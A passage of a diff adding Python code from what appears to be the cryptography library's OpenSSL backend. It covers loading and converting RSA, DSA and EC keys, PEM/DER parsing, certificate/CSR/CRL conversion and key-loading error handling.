+ numbers.public_numbers.n, + ) + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + p = self._int_to_bn(numbers.p) + q = self._int_to_bn(numbers.q) + d = self._int_to_bn(numbers.d) + dmp1 = self._int_to_bn(numbers.dmp1) + dmq1 = self._int_to_bn(numbers.dmq1) + iqmp = self._int_to_bn(numbers.iqmp) + e = self._int_to_bn(numbers.public_numbers.e) + n = self._int_to_bn(numbers.public_numbers.n) + res = self._lib.RSA_set0_factors(rsa_cdata, p, q) + self.openssl_assert(res == 1) + res = self._lib.RSA_set0_key(rsa_cdata, n, e, d) + self.openssl_assert(res == 1) + res = self._lib.RSA_set0_crt_params(rsa_cdata, dmp1, dmq1, iqmp) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPrivateKey( + self, rsa_cdata, evp_pkey, self._rsa_skip_check_key + ) + + def load_rsa_public_numbers( + self, numbers: rsa.RSAPublicNumbers + ) -> rsa.RSAPublicKey: + rsa._check_public_key_components(numbers.e, numbers.n) + rsa_cdata = self._lib.RSA_new() + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + e = self._int_to_bn(numbers.e) + n = self._int_to_bn(numbers.n) + res = self._lib.RSA_set0_key(rsa_cdata, n, e, self._ffi.NULL) + self.openssl_assert(res == 1) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + + def _create_evp_pkey_gc(self): + evp_pkey = self._lib.EVP_PKEY_new() + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return evp_pkey + + def _rsa_cdata_to_evp_pkey(self, rsa_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_RSA(evp_pkey, rsa_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def _bytes_to_bio(self, data: bytes): + """ + Return a _MemoryBIO namedtuple of (BIO, char*). + + The char* is the storage for the BIO and it must stay alive until the + BIO is finished with. 
+        """
+        data_ptr = self._ffi.from_buffer(data)
+        bio = self._lib.BIO_new_mem_buf(data_ptr, len(data))
+        self.openssl_assert(bio != self._ffi.NULL)
+
+        return _MemoryBIO(self._ffi.gc(bio, self._lib.BIO_free), data_ptr)
+
+    def _create_mem_bio_gc(self):
+        """
+        Creates an empty memory BIO.
+        """
+        bio_method = self._lib.BIO_s_mem()
+        self.openssl_assert(bio_method != self._ffi.NULL)
+        bio = self._lib.BIO_new(bio_method)
+        self.openssl_assert(bio != self._ffi.NULL)
+        bio = self._ffi.gc(bio, self._lib.BIO_free)
+        return bio
+
+    def _read_mem_bio(self, bio) -> bytes:
+        """
+        Reads a memory BIO. This only works on memory BIOs.
+        """
+        buf = self._ffi.new("char **")
+        buf_len = self._lib.BIO_get_mem_data(bio, buf)
+        self.openssl_assert(buf_len > 0)
+        self.openssl_assert(buf[0] != self._ffi.NULL)
+        bio_data = self._ffi.buffer(buf[0], buf_len)[:]
+        return bio_data
+
+    def _evp_pkey_to_private_key(self, evp_pkey) -> PRIVATE_KEY_TYPES:
+        """
+        Return the appropriate type of PrivateKey given an evp_pkey cdata
+        pointer.
+        """
+
+        key_type = self._lib.EVP_PKEY_id(evp_pkey)
+
+        if key_type == self._lib.EVP_PKEY_RSA:
+            rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey)
+            self.openssl_assert(rsa_cdata != self._ffi.NULL)
+            rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free)
+            return _RSAPrivateKey(
+                self, rsa_cdata, evp_pkey, self._rsa_skip_check_key
+            )
+        elif (
+            key_type == self._lib.EVP_PKEY_RSA_PSS
+            and not self._lib.CRYPTOGRAPHY_IS_LIBRESSL
+            and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL
+            and not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111E
+        ):
+            # At the moment the way we handle RSA PSS keys is to strip the
+            # PSS constraints from them and treat them as normal RSA keys.
+            # Unfortunately the RSA * itself tracks this data so we need to
+            # extract, serialize, and reload it without the constraints.
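+            # Editor's note (illustrative sketch, not part of the module):
+            # seen from the public API, the effect of this branch is that an
+            # RSA-PSS key simply loads as a plain RSAPrivateKey, e.g.:
+            #
+            #     from cryptography.hazmat.primitives.serialization import (
+            #         load_pem_private_key,
+            #     )
+            #     key = load_pem_private_key(pss_key_pem, password=None)
+            #     # -> RSAPrivateKey; the PSS restrictions are discarded
+            #
+            # `pss_key_pem` is a hypothetical PEM-encoded RSA-PSS key.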
+ rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey) + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + bio = self._create_mem_bio_gc() + res = self._lib.i2d_RSAPrivateKey_bio(bio, rsa_cdata) + self.openssl_assert(res == 1) + return self.load_der_private_key( + self._read_mem_bio(bio), password=None + ) + elif key_type == self._lib.EVP_PKEY_DSA: + dsa_cdata = self._lib.EVP_PKEY_get1_DSA(evp_pkey) + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + return _DSAPrivateKey(self, dsa_cdata, evp_pkey) + elif key_type == self._lib.EVP_PKEY_EC: + ec_cdata = self._lib.EVP_PKEY_get1_EC_KEY(evp_pkey) + self.openssl_assert(ec_cdata != self._ffi.NULL) + ec_cdata = self._ffi.gc(ec_cdata, self._lib.EC_KEY_free) + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + elif key_type in self._dh_types: + dh_cdata = self._lib.EVP_PKEY_get1_DH(evp_pkey) + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHPrivateKey(self, dh_cdata, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED25519", None): + # EVP_PKEY_ED25519 is not present in OpenSSL < 1.1.1 + return _Ed25519PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X448", None): + # EVP_PKEY_X448 is not present in OpenSSL < 1.1.1 + return _X448PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X25519", None): + # EVP_PKEY_X25519 is not present in OpenSSL < 1.1.0 + return _X25519PrivateKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED448", None): + # EVP_PKEY_ED448 is not present in OpenSSL < 1.1.1 + return _Ed448PrivateKey(self, evp_pkey) + else: + raise UnsupportedAlgorithm("Unsupported key type.") + + def _evp_pkey_to_public_key(self, evp_pkey) -> PUBLIC_KEY_TYPES: + """ + Return the appropriate type of PublicKey given an evp_pkey cdata + pointer. 
+        """
+
+        key_type = self._lib.EVP_PKEY_id(evp_pkey)
+
+        if key_type == self._lib.EVP_PKEY_RSA:
+            rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey)
+            self.openssl_assert(rsa_cdata != self._ffi.NULL)
+            rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free)
+            return _RSAPublicKey(self, rsa_cdata, evp_pkey)
+        elif key_type == self._lib.EVP_PKEY_DSA:
+            dsa_cdata = self._lib.EVP_PKEY_get1_DSA(evp_pkey)
+            self.openssl_assert(dsa_cdata != self._ffi.NULL)
+            dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free)
+            return _DSAPublicKey(self, dsa_cdata, evp_pkey)
+        elif key_type == self._lib.EVP_PKEY_EC:
+            ec_cdata = self._lib.EVP_PKEY_get1_EC_KEY(evp_pkey)
+            if ec_cdata == self._ffi.NULL:
+                errors = self._consume_errors_with_text()
+                raise ValueError("Unable to load EC key", errors)
+            ec_cdata = self._ffi.gc(ec_cdata, self._lib.EC_KEY_free)
+            return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey)
+        elif key_type in self._dh_types:
+            dh_cdata = self._lib.EVP_PKEY_get1_DH(evp_pkey)
+            self.openssl_assert(dh_cdata != self._ffi.NULL)
+            dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free)
+            return _DHPublicKey(self, dh_cdata, evp_pkey)
+        elif key_type == getattr(self._lib, "EVP_PKEY_ED25519", None):
+            # EVP_PKEY_ED25519 is not present in OpenSSL < 1.1.1
+            return _Ed25519PublicKey(self, evp_pkey)
+        elif key_type == getattr(self._lib, "EVP_PKEY_X448", None):
+            # EVP_PKEY_X448 is not present in OpenSSL < 1.1.1
+            return _X448PublicKey(self, evp_pkey)
+        elif key_type == getattr(self._lib, "EVP_PKEY_X25519", None):
+            # EVP_PKEY_X25519 is not present in OpenSSL < 1.1.0
+            return _X25519PublicKey(self, evp_pkey)
+        elif key_type == getattr(self._lib, "EVP_PKEY_ED448", None):
+            # EVP_PKEY_ED448 is not present in OpenSSL < 1.1.1
+            return _Ed448PublicKey(self, evp_pkey)
+        else:
+            raise UnsupportedAlgorithm("Unsupported key type.")
+
+    def _oaep_hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool:
+        return isinstance(
+            algorithm,
+            (
+                hashes.SHA1,
+                hashes.SHA224,
+                hashes.SHA256,
+                hashes.SHA384,
+                hashes.SHA512,
+            ),
+        )
+
+    def rsa_padding_supported(self, padding: AsymmetricPadding) -> bool:
+        if isinstance(padding, PKCS1v15):
+            return True
+        elif isinstance(padding, PSS) and isinstance(padding._mgf, MGF1):
+            # SHA1 is permissible in MGF1 in FIPS even when SHA1 is blocked
+            # as signature algorithm.
+            if self._fips_enabled and isinstance(
+                padding._mgf._algorithm, hashes.SHA1
+            ):
+                return True
+            else:
+                return self.hash_supported(padding._mgf._algorithm)
+        elif isinstance(padding, OAEP) and isinstance(padding._mgf, MGF1):
+            return self._oaep_hash_supported(
+                padding._mgf._algorithm
+            ) and self._oaep_hash_supported(padding._algorithm)
+        else:
+            return False
+
+    def generate_dsa_parameters(self, key_size: int) -> dsa.DSAParameters:
+        if key_size not in (1024, 2048, 3072, 4096):
+            raise ValueError(
+                "Key size must be 1024, 2048, 3072, or 4096 bits."
+ ) + + ctx = self._lib.DSA_new() + self.openssl_assert(ctx != self._ffi.NULL) + ctx = self._ffi.gc(ctx, self._lib.DSA_free) + + res = self._lib.DSA_generate_parameters_ex( + ctx, + key_size, + self._ffi.NULL, + 0, + self._ffi.NULL, + self._ffi.NULL, + self._ffi.NULL, + ) + + self.openssl_assert(res == 1) + + return _DSAParameters(self, ctx) + + def generate_dsa_private_key( + self, parameters: dsa.DSAParameters + ) -> dsa.DSAPrivateKey: + ctx = self._lib.DSAparams_dup( + parameters._dsa_cdata # type: ignore[attr-defined] + ) + self.openssl_assert(ctx != self._ffi.NULL) + ctx = self._ffi.gc(ctx, self._lib.DSA_free) + self._lib.DSA_generate_key(ctx) + evp_pkey = self._dsa_cdata_to_evp_pkey(ctx) + + return _DSAPrivateKey(self, ctx, evp_pkey) + + def generate_dsa_private_key_and_parameters( + self, key_size: int + ) -> dsa.DSAPrivateKey: + parameters = self.generate_dsa_parameters(key_size) + return self.generate_dsa_private_key(parameters) + + def _dsa_cdata_set_values(self, dsa_cdata, p, q, g, pub_key, priv_key): + res = self._lib.DSA_set0_pqg(dsa_cdata, p, q, g) + self.openssl_assert(res == 1) + res = self._lib.DSA_set0_key(dsa_cdata, pub_key, priv_key) + self.openssl_assert(res == 1) + + def load_dsa_private_numbers( + self, numbers: dsa.DSAPrivateNumbers + ) -> dsa.DSAPrivateKey: + dsa._check_dsa_private_numbers(numbers) + parameter_numbers = numbers.public_numbers.parameter_numbers + + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(parameter_numbers.p) + q = self._int_to_bn(parameter_numbers.q) + g = self._int_to_bn(parameter_numbers.g) + pub_key = self._int_to_bn(numbers.public_numbers.y) + priv_key = self._int_to_bn(numbers.x) + self._dsa_cdata_set_values(dsa_cdata, p, q, g, pub_key, priv_key) + + evp_pkey = self._dsa_cdata_to_evp_pkey(dsa_cdata) + + return _DSAPrivateKey(self, dsa_cdata, evp_pkey) + + def load_dsa_public_numbers( + self, numbers: dsa.DSAPublicNumbers + ) -> dsa.DSAPublicKey: + dsa._check_dsa_parameters(numbers.parameter_numbers) + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(numbers.parameter_numbers.p) + q = self._int_to_bn(numbers.parameter_numbers.q) + g = self._int_to_bn(numbers.parameter_numbers.g) + pub_key = self._int_to_bn(numbers.y) + priv_key = self._ffi.NULL + self._dsa_cdata_set_values(dsa_cdata, p, q, g, pub_key, priv_key) + + evp_pkey = self._dsa_cdata_to_evp_pkey(dsa_cdata) + + return _DSAPublicKey(self, dsa_cdata, evp_pkey) + + def load_dsa_parameter_numbers( + self, numbers: dsa.DSAParameterNumbers + ) -> dsa.DSAParameters: + dsa._check_dsa_parameters(numbers) + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(numbers.p) + q = self._int_to_bn(numbers.q) + g = self._int_to_bn(numbers.g) + res = self._lib.DSA_set0_pqg(dsa_cdata, p, q, g) + self.openssl_assert(res == 1) + + return _DSAParameters(self, dsa_cdata) + + def _dsa_cdata_to_evp_pkey(self, dsa_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_DSA(evp_pkey, dsa_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def dsa_supported(self) -> bool: + return not self._fips_enabled + + def dsa_hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + if not self.dsa_supported(): + return False + return 
self.signature_hash_supported(algorithm) + + def cmac_algorithm_supported(self, algorithm) -> bool: + return self.cipher_supported( + algorithm, CBC(b"\x00" * algorithm.block_size) + ) + + def create_cmac_ctx(self, algorithm: BlockCipherAlgorithm) -> _CMACContext: + return _CMACContext(self, algorithm) + + def load_pem_private_key( + self, data: bytes, password: typing.Optional[bytes] + ) -> PRIVATE_KEY_TYPES: + return self._load_key( + self._lib.PEM_read_bio_PrivateKey, + self._evp_pkey_to_private_key, + data, + password, + ) + + def load_pem_public_key(self, data: bytes) -> PUBLIC_KEY_TYPES: + mem_bio = self._bytes_to_bio(data) + # In OpenSSL 3.0.x the PEM_read_bio_PUBKEY function will invoke + # the default password callback if you pass an encrypted private + # key. This is very, very, very bad as the default callback can + # trigger an interactive console prompt, which will hang the + # Python process. We therefore provide our own callback to + # catch this and error out properly. + userdata = self._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *") + evp_pkey = self._lib.PEM_read_bio_PUBKEY( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + if evp_pkey != self._ffi.NULL: + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return self._evp_pkey_to_public_key(evp_pkey) + else: + # It's not a (RSA/DSA/ECDSA) subjectPublicKeyInfo, but we still + # need to check to see if it is a pure PKCS1 RSA public key (not + # embedded in a subjectPublicKeyInfo) + self._consume_errors() + res = self._lib.BIO_reset(mem_bio.bio) + self.openssl_assert(res == 1) + rsa_cdata = self._lib.PEM_read_bio_RSAPublicKey( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + if rsa_cdata != self._ffi.NULL: + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + else: + self._handle_key_loading_error() + + def load_pem_parameters(self, data: bytes) -> dh.DHParameters: + mem_bio = self._bytes_to_bio(data) + # only DH is supported currently + dh_cdata = self._lib.PEM_read_bio_DHparams( + mem_bio.bio, self._ffi.NULL, self._ffi.NULL, self._ffi.NULL + ) + if dh_cdata != self._ffi.NULL: + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHParameters(self, dh_cdata) + else: + self._handle_key_loading_error() + + def load_der_private_key( + self, data: bytes, password: typing.Optional[bytes] + ) -> PRIVATE_KEY_TYPES: + # OpenSSL has a function called d2i_AutoPrivateKey that in theory + # handles this automatically, however it doesn't handle encrypted + # private keys. Instead we try to load the key two different ways. + # First we'll try to load it as a traditional key. + bio_data = self._bytes_to_bio(data) + key = self._evp_pkey_from_der_traditional_key(bio_data, password) + if key: + return self._evp_pkey_to_private_key(key) + else: + # Finally we try to load it with the method that handles encrypted + # PKCS8 properly. + return self._load_key( + self._lib.d2i_PKCS8PrivateKey_bio, + self._evp_pkey_to_private_key, + data, + password, + ) + + def _evp_pkey_from_der_traditional_key(self, bio_data, password): + key = self._lib.d2i_PrivateKey_bio(bio_data.bio, self._ffi.NULL) + if key != self._ffi.NULL: + # In OpenSSL 3.0.0-alpha15 there exist scenarios where the key will + # successfully load but errors are still put on the stack. 
Tracked
+            # as https://github.com/openssl/openssl/issues/14996
+            self._consume_errors()
+
+            key = self._ffi.gc(key, self._lib.EVP_PKEY_free)
+            if password is not None:
+                raise TypeError(
+                    "Password was given but private key is not encrypted."
+                )
+
+            return key
+        else:
+            self._consume_errors()
+            return None
+
+    def load_der_public_key(self, data: bytes) -> PUBLIC_KEY_TYPES:
+        mem_bio = self._bytes_to_bio(data)
+        evp_pkey = self._lib.d2i_PUBKEY_bio(mem_bio.bio, self._ffi.NULL)
+        if evp_pkey != self._ffi.NULL:
+            evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free)
+            return self._evp_pkey_to_public_key(evp_pkey)
+        else:
+            # It's not a (RSA/DSA/ECDSA) subjectPublicKeyInfo, but we still
+            # need to check to see if it is a pure PKCS1 RSA public key (not
+            # embedded in a subjectPublicKeyInfo)
+            self._consume_errors()
+            res = self._lib.BIO_reset(mem_bio.bio)
+            self.openssl_assert(res == 1)
+            rsa_cdata = self._lib.d2i_RSAPublicKey_bio(
+                mem_bio.bio, self._ffi.NULL
+            )
+            if rsa_cdata != self._ffi.NULL:
+                rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free)
+                evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata)
+                return _RSAPublicKey(self, rsa_cdata, evp_pkey)
+            else:
+                self._handle_key_loading_error()
+
+    def load_der_parameters(self, data: bytes) -> dh.DHParameters:
+        mem_bio = self._bytes_to_bio(data)
+        dh_cdata = self._lib.d2i_DHparams_bio(mem_bio.bio, self._ffi.NULL)
+        if dh_cdata != self._ffi.NULL:
+            dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free)
+            return _DHParameters(self, dh_cdata)
+        elif self._lib.Cryptography_HAS_EVP_PKEY_DHX:
+            # We check to see if the data is dhx.
+            self._consume_errors()
+            res = self._lib.BIO_reset(mem_bio.bio)
+            self.openssl_assert(res == 1)
+            dh_cdata = self._lib.Cryptography_d2i_DHxparams_bio(
+                mem_bio.bio, self._ffi.NULL
+            )
+            if dh_cdata != self._ffi.NULL:
+                dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free)
+                return _DHParameters(self, dh_cdata)
+
+        self._handle_key_loading_error()
+
+    def _cert2ossl(self, cert: x509.Certificate) -> typing.Any:
+        data = cert.public_bytes(serialization.Encoding.DER)
+        mem_bio = self._bytes_to_bio(data)
+        x509 = self._lib.d2i_X509_bio(mem_bio.bio, self._ffi.NULL)
+        self.openssl_assert(x509 != self._ffi.NULL)
+        x509 = self._ffi.gc(x509, self._lib.X509_free)
+        return x509
+
+    def _ossl2cert(self, x509: typing.Any) -> x509.Certificate:
+        bio = self._create_mem_bio_gc()
+        res = self._lib.i2d_X509_bio(bio, x509)
+        self.openssl_assert(res == 1)
+        return rust_x509.load_der_x509_certificate(self._read_mem_bio(bio))
+
+    def _csr2ossl(self, csr: x509.CertificateSigningRequest) -> typing.Any:
+        data = csr.public_bytes(serialization.Encoding.DER)
+        mem_bio = self._bytes_to_bio(data)
+        x509_req = self._lib.d2i_X509_REQ_bio(mem_bio.bio, self._ffi.NULL)
+        self.openssl_assert(x509_req != self._ffi.NULL)
+        x509_req = self._ffi.gc(x509_req, self._lib.X509_REQ_free)
+        return x509_req
+
+    def _ossl2csr(
+        self, x509_req: typing.Any
+    ) -> x509.CertificateSigningRequest:
+        bio = self._create_mem_bio_gc()
+        res = self._lib.i2d_X509_REQ_bio(bio, x509_req)
+        self.openssl_assert(res == 1)
+        return rust_x509.load_der_x509_csr(self._read_mem_bio(bio))
+
+    def _crl2ossl(self, crl: x509.CertificateRevocationList) -> typing.Any:
+        data = crl.public_bytes(serialization.Encoding.DER)
+        mem_bio = self._bytes_to_bio(data)
+        x509_crl = self._lib.d2i_X509_CRL_bio(mem_bio.bio, self._ffi.NULL)
+        self.openssl_assert(x509_crl != self._ffi.NULL)
+        x509_crl = self._ffi.gc(x509_crl, self._lib.X509_CRL_free)
+        return x509_crl
+
+    def _ossl2crl(
+        self, x509_crl: 
typing.Any + ) -> x509.CertificateRevocationList: + bio = self._create_mem_bio_gc() + res = self._lib.i2d_X509_CRL_bio(bio, x509_crl) + self.openssl_assert(res == 1) + return rust_x509.load_der_x509_crl(self._read_mem_bio(bio)) + + def _crl_is_signature_valid( + self, + crl: x509.CertificateRevocationList, + public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + ) -> bool: + if not isinstance( + public_key, + ( + _DSAPublicKey, + _RSAPublicKey, + _EllipticCurvePublicKey, + ), + ): + raise TypeError( + "Expecting one of DSAPublicKey, RSAPublicKey," + " or EllipticCurvePublicKey." + ) + x509_crl = self._crl2ossl(crl) + res = self._lib.X509_CRL_verify(x509_crl, public_key._evp_pkey) + + if res != 1: + self._consume_errors() + return False + + return True + + def _csr_is_signature_valid( + self, csr: x509.CertificateSigningRequest + ) -> bool: + x509_req = self._csr2ossl(csr) + pkey = self._lib.X509_REQ_get_pubkey(x509_req) + self.openssl_assert(pkey != self._ffi.NULL) + pkey = self._ffi.gc(pkey, self._lib.EVP_PKEY_free) + res = self._lib.X509_REQ_verify(x509_req, pkey) + + if res != 1: + self._consume_errors() + return False + + return True + + def _check_keys_correspond(self, key1, key2): + if self._lib.EVP_PKEY_cmp(key1._evp_pkey, key2._evp_pkey) != 1: + raise ValueError("Keys do not correspond") + + def _load_key(self, openssl_read_func, convert_func, data, password): + mem_bio = self._bytes_to_bio(data) + + userdata = self._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *") + if password is not None: + utils._check_byteslike("password", password) + password_ptr = self._ffi.from_buffer(password) + userdata.password = password_ptr + userdata.length = len(password) + + evp_pkey = openssl_read_func( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + + if evp_pkey == self._ffi.NULL: + if userdata.error != 0: + self._consume_errors() + if userdata.error == -1: + raise TypeError( + "Password was not given but private key is encrypted" + ) + else: + assert userdata.error == -2 + raise ValueError( + "Passwords longer than {} bytes are not supported " + "by this backend.".format(userdata.maxsize - 1) + ) + else: + self._handle_key_loading_error() + + # In OpenSSL 3.0.0-alpha15 there exist scenarios where the key will + # successfully load but errors are still put on the stack. Tracked + # as https://github.com/openssl/openssl/issues/14996 + self._consume_errors() + + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + if password is not None and userdata.called == 0: + raise TypeError( + "Password was given but private key is not encrypted." + ) + + assert ( + password is not None and userdata.called == 1 + ) or password is None + + return convert_func(evp_pkey) + + def _handle_key_loading_error(self) -> typing.NoReturn: + errors = self._consume_errors() + + if not errors: + raise ValueError( + "Could not deserialize key data. The data may be in an " + "incorrect format or it may be encrypted with an unsupported " + "algorithm." + ) + + elif ( + errors[0]._lib_reason_match( + self._lib.ERR_LIB_EVP, self._lib.EVP_R_BAD_DECRYPT + ) + or errors[0]._lib_reason_match( + self._lib.ERR_LIB_PKCS12, + self._lib.PKCS12_R_PKCS12_CIPHERFINAL_ERROR, + ) + or ( + self._lib.Cryptography_HAS_PROVIDERS + and errors[0]._lib_reason_match( + self._lib.ERR_LIB_PROV, + self._lib.PROV_R_BAD_DECRYPT, + ) + ) + ): + raise ValueError("Bad decrypt. 
Incorrect password?") + + elif any( + error._lib_reason_match( + self._lib.ERR_LIB_EVP, + self._lib.EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM, + ) + for error in errors + ): + raise ValueError("Unsupported public key algorithm.") + + else: + errors_with_text = binding._errors_with_text(errors) + raise ValueError( + "Could not deserialize key data. The data may be in an " + "incorrect format, it may be encrypted with an unsupported " + "algorithm, or it may be an unsupported key type (e.g. EC " + "curves with explicit parameters).", + errors_with_text, + ) + + def elliptic_curve_supported(self, curve: ec.EllipticCurve) -> bool: + try: + curve_nid = self._elliptic_curve_to_nid(curve) + except UnsupportedAlgorithm: + curve_nid = self._lib.NID_undef + + group = self._lib.EC_GROUP_new_by_curve_name(curve_nid) + + if group == self._ffi.NULL: + self._consume_errors() + return False + else: + self.openssl_assert(curve_nid != self._lib.NID_undef) + self._lib.EC_GROUP_free(group) + return True + + def elliptic_curve_signature_algorithm_supported( + self, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + curve: ec.EllipticCurve, + ) -> bool: + # We only support ECDSA right now. + if not isinstance(signature_algorithm, ec.ECDSA): + return False + + return self.elliptic_curve_supported(curve) + + def generate_elliptic_curve_private_key( + self, curve: ec.EllipticCurve + ) -> ec.EllipticCurvePrivateKey: + """ + Generate a new private key on the named curve. + """ + + if self.elliptic_curve_supported(curve): + ec_cdata = self._ec_key_new_by_curve(curve) + + res = self._lib.EC_KEY_generate_key(ec_cdata) + self.openssl_assert(res == 1) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + else: + raise UnsupportedAlgorithm( + "Backend object does not support {}.".format(curve.name), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + + def load_elliptic_curve_private_numbers( + self, numbers: ec.EllipticCurvePrivateNumbers + ) -> ec.EllipticCurvePrivateKey: + public = numbers.public_numbers + + ec_cdata = self._ec_key_new_by_curve(public.curve) + + private_value = self._ffi.gc( + self._int_to_bn(numbers.private_value), self._lib.BN_clear_free + ) + res = self._lib.EC_KEY_set_private_key(ec_cdata, private_value) + if res != 1: + self._consume_errors() + raise ValueError("Invalid EC key.") + + self._ec_key_set_public_key_affine_coordinates( + ec_cdata, public.x, public.y + ) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + + def load_elliptic_curve_public_numbers( + self, numbers: ec.EllipticCurvePublicNumbers + ) -> ec.EllipticCurvePublicKey: + ec_cdata = self._ec_key_new_by_curve(numbers.curve) + self._ec_key_set_public_key_affine_coordinates( + ec_cdata, numbers.x, numbers.y + ) + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey) + + def load_elliptic_curve_public_bytes( + self, curve: ec.EllipticCurve, point_bytes: bytes + ) -> ec.EllipticCurvePublicKey: + ec_cdata = self._ec_key_new_by_curve(curve) + group = self._lib.EC_KEY_get0_group(ec_cdata) + self.openssl_assert(group != self._ffi.NULL) + point = self._lib.EC_POINT_new(group) + self.openssl_assert(point != self._ffi.NULL) + point = self._ffi.gc(point, self._lib.EC_POINT_free) + with self._tmp_bn_ctx() as bn_ctx: + res = self._lib.EC_POINT_oct2point( + group, point, point_bytes, len(point_bytes), bn_ctx + ) + if res != 1: + self._consume_errors() + raise 
ValueError("Invalid public bytes for the given curve") + + res = self._lib.EC_KEY_set_public_key(ec_cdata, point) + self.openssl_assert(res == 1) + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey) + + def derive_elliptic_curve_private_key( + self, private_value: int, curve: ec.EllipticCurve + ) -> ec.EllipticCurvePrivateKey: + ec_cdata = self._ec_key_new_by_curve(curve) + + get_func, group = self._ec_key_determine_group_get_func(ec_cdata) + + point = self._lib.EC_POINT_new(group) + self.openssl_assert(point != self._ffi.NULL) + point = self._ffi.gc(point, self._lib.EC_POINT_free) + + value = self._int_to_bn(private_value) + value = self._ffi.gc(value, self._lib.BN_clear_free) + + with self._tmp_bn_ctx() as bn_ctx: + res = self._lib.EC_POINT_mul( + group, point, value, self._ffi.NULL, self._ffi.NULL, bn_ctx + ) + self.openssl_assert(res == 1) + + bn_x = self._lib.BN_CTX_get(bn_ctx) + bn_y = self._lib.BN_CTX_get(bn_ctx) + + res = get_func(group, point, bn_x, bn_y, bn_ctx) + if res != 1: + self._consume_errors() + raise ValueError("Unable to derive key from private_value") + + res = self._lib.EC_KEY_set_public_key(ec_cdata, point) + self.openssl_assert(res == 1) + private = self._int_to_bn(private_value) + private = self._ffi.gc(private, self._lib.BN_clear_free) + res = self._lib.EC_KEY_set_private_key(ec_cdata, private) + self.openssl_assert(res == 1) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + + def _ec_key_new_by_curve(self, 